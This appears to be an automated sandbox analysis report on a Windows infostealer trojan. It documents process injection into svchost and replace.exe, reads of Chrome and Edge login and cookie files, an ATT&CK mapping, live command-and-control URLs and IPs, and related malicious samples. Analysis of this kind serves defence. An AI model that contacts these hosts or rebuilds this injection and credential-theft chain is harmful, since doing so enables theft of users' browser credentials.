            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 7296
            Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 30B1008
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YSjOEAta07.exe"
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: YSjOEAta07.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 412 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            [Behavior graph] Behavior Graph ID: 1528155 Sample: YSjOEAta07.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100
            Process chain: YSjOEAta07.exe -> svchost.exe (started) -> GmuPchEfAM.exe (injected) -> replace.exe (started) -> GmuPchEfAM.exe (injected), firefox.exe (started)

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | YSjOEAta07.exe | 53% | ReversingLabs | Win32.Trojan.Leonem | |
            | YSjOEAta07.exe | 100% | Avira | HEUR/AGEN.1321671 | |
            | YSjOEAta07.exe | 100% | Joe Sandbox ML | | |

            No Antivirus matches

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
            | https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
            | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
            | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
            | https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
            | https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | |
            | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
            | https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | |
                                                                      unknown
                                                                      http://www.sterkus.xyz/ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ==false
                                                                        unknown
                                                                        http://www.ks1x7i.vip/uxh9/false
                                                                          unknown
                                                                          http://www.warriorsyndrome.net/kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tffalse
                                                                            unknown
                                                                            http://www.galaxyslot88rtp.lat/lbpf/false
                                                                              unknown
                                                                              http://www.pakmartcentral.shop/ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                unknown
                                                                                http://www.syncnodex.net/xx1z/false
                                                                                  unknown
                                                                                  http://www.tracy.club/fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                    unknown
                                                                                    http://www.pakmartcentral.shop/ml5l/false
                                                                                      unknown
                                                                                      http://www.les-massage.online/74ou/false
                                                                                        unknown
                                                                                        http://www.kovallo.cloud/kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                          unknown
                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                          https://htmlcodex.comreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://duckduckgo.com/chrome_newtabreplace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.les-massage.onlineGmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://duckduckgo.com/ac/?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://cdn.jsdelivr.net/npm/bootstrapreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://login.live.creplace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZqreplace.exe, 00000004.00000002.3172177851.0000000003948000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000033B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://code.jquery.com/jquery-3.4.1.min.jsreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.ecosia.org/newtab/replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://cdn.jsdelivr.net/npm/bootstrap-iconsreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://ac.ecosia.org/autocomplete?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://htmlcodex.com/credit-removalreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            209.74.95.29
                                                                                                            www.sterkus.xyzUnited States
                                                                                                            31744MULTIBAND-NEWHOPEUStrue
                                                                                                            46.17.172.49
                                                                                                            galaxyslot88rtp.latGermany
                                                                                                            47583AS-HOSTINGERLTfalse
                                                                                                            84.32.84.32
                                                                                                            pakmartcentral.shopLithuania
                                                                                                            33922NTT-LT-ASLTfalse
                                                                                                            81.2.196.19
                                                                                                            kovallo.cloudCzech Republic
                                                                                                            24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                            194.58.112.174
                                                                                                            www.les-massage.onlineRussian Federation
                                                                                                            197695AS-REGRUfalse
                                                                                                            3.33.130.190
                                                                                                            tracy.clubUnited States
                                                                                                            8987AMAZONEXPANSIONGBfalse
                                                                                                            172.81.61.224
                                                                                                            www.moritynomxd.xyzUnited States
                                                                                                            22552ESITEDUStrue
                                                                                                            94.73.146.114
                                                                                                            sppsuperplast.onlineTurkey
                                                                                                            34619CIZGITRfalse
                                                                                                            15.197.172.60
                                                                                                            www.syncnodex.netUnited States
                                                                                                            7430TANDEMUSfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528155
Start date and time: 2024-10-07 15:53:42 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YSjOEAta07.exe
renamed because original name is a hash value
Original Sample Name: a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@11/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 35
• Number of non-executed functions: 318
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target GmuPchEfAM.exe, PID 1672 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: YSjOEAta07.exe
Time | Type | Description
09:55:23 | API Interceptor | 6880563x Sleep call for process: replace.exe modified
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            NTT-LT-ASLTPending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            SOA SEPT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 84.32.84.32
                                                                                                            http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.33
                                                                                                            GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                            • 84.32.84.32
                                                                                                            AS-HOSTINGERLTArrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 212.1.210.65
                                                                                                            https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 212.1.210.65
                                                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            http://email.technologycurrent.co/c/eJxszruutCoAxfGn0ZJwRwqLk0z2a-xwVcQBLyiMT38yu_7a__oVy45MOig4692IBBaIMYpFP48ODYNEDhPqjbFSUey0hpQJq9g39GHEEFMoMYUMEyqA-5MDR9YOimjaUVicmVNe8_Qx13G4VIDJ_TrOpWwd-a_DPx3-KYcyEfxLfnfy08rakReFYX-awMuMypWgRfapXu8T1PmuftcLv-dtd5VbhPiVeQs-yHuQDC9GfvSHn1JMktV7Njxd2kXYbrgt4QnvayKuCHMINKmdf05bzXORKcbdTfCsJkQRs7ggoS2fKYeDyeRpDj7qwHTektYEyhg1zFUKZvWnyCP4p7nFipqkTwshdD6Xmdvn_eSMq0ttOLem5HQZb9d9XYlgDuuIMtS6rbtQHeYuzB153dsauUe0yORK2xe8yJrTCWMM60TvWj3G79Jh_vt7lvfWkdcZVUvpr-S0lo685v4Y1eoPZzM4N3eo9KiOwuo2BdzVl7GBM6qQIcD7swMIEEEFBQ8Weui0AVnFu4LvQwWQMHt_j_j_AAAA__8ljcBoGet hashmaliciousUnknownBrowse
                                                                                                            • 31.170.167.140
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            https://ap.lc/ZEpPnGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 45.84.207.112
                                                                                                            https://pub-030caf7977104c7399cc2aba5fb31b23.r2.dev/tcg33.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 45.84.207.112
                                                                                                            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 31.220.106.87
                                                                                                            firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 153.92.11.109
                                                                                                            INTERNET-CZKtis238403KtisCZRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
